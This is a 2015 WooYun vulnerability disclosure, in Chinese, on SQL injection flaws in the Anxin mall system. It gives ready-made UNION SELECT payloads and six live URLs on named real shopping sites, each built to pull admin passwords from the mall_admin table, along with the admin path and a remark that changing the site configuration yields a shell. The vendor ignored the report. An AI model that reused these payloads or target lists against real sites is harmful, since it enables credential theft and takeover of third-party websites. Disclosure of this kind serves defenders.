安信商城系统多处sql注入 | wooyun-2015-0107004| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0107004

漏洞标题：安信商城系统多处sql注入

漏洞作者： %270x5c

提交时间：2015-04-10 14:23

修复时间：2015-05-25 14:24

公开时间：2015-05-25 14:24

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-04-10：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-05-25：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

3个注入。

详细说明：

先来几个互联网实例，证明其通用性。

http://www.xiaomaow.com/s/index.asp?id=24&a=tgdetails&prodid=21%20union%20select%20%201,2,password,4,5,6,7,8,9%20from%20mall_admin%20%16
http://www.gtgw.wang/s/index.asp?id=1&a=tgdetails&prodid=18%20union%20select%20top%201%201,2,password,4,5,6,7,8,9%20from%20mall_admin%20%16
http://shop.bjpc-link.cn/s/index.asp?id=1&a=tgdetails&prodid=18%20union%20select%20top%201%201,2,admin,4,5,6,7,8,9%20from%20mall_admin%20%20%16
http://www.idiniu.com/s/index.asp?id=42&a=tgdetails&prodid=41%20union%20select%20top%201%201,2,password,4,5,6,7,8,9%20from%20mall_admin%20%16
http://www.v0755.cn/s/index.asp?id=1&a=tgdetails&prodid=18%20union%20select%20top%201%201,2,password,4,5,6,7,8,9%20from%20mall_admin%20%16
http://www.maizfx.com/s/index.asp?id=46&a=tgdetails&prodid=27%20union%20select%20top%201%201,2,password,4,5,6,7,8,9%20from%20mall_admin%20%16

后台地址 /s_admin
修改网站配置可拿shell。
由于代码加密，所以黑盒测试。
---------------------------------------------------------------------------------------
#1
/s/index.asp
prodid参数未过滤。
exp:

s/?id=24&a=tgdetails&prodid=21 union select 1,2,password,4,5,6,7,8,9 from mall_admin %16

#2
/s/index.asp
id参数

#3
index.asp
key参数未作任何处理导致注入。

漏洞证明：

修复方案：

加强过滤。

版权声明：转载请注明来源 %270x5c@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝